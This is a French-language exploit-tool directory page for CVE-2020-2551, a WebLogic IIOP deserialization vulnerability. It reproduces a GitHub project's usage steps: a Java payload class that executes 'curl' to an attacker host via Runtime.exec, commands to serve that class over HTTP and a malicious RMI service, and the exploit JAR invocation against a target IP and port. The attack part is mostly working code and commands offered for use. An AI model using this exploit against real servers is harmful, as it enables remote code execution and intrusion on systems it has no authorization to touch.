Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
Outils/GitHubGitHub/y4er/cve-2020-2551
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

Voir le dépôt
336782il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-2551

Désérialisation IIOP de Weblogic

Environnement de test

Weblogic 10.3.6 + JDK 1.6

JAR packagé Code d'extraction : a6ob

Exploitation

Téléchargez le fichier JAR, puis utilisez marshalsec pour démarrer un service RMI malveillant, compilez localement un fichier exp.java

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Essayez de compiler avec la même version de JDK et les mêmes bibliothèques de dépendances (wlfullclient.jar) que celles utilisées par Weblogic puis démarrez un serveur web localement

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

Exécutez la commande suivante pour lancer le fichier JAR

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

Résultat attendu : image

Problèmes connus

Télécharger l’outil

De nombreuses personnes signalent que la reproduction échoue. En consultant des articles en ligne, on constate que IIOP a un problème de mode NAT. Aujourd'hui, j'ai trouvé un article sur Xianzhi : https://xz.aliyun.com/t/7498. Veuillez vous y référer.

Référence

https://y4er.com/post/weblogic-cve-2020-2551/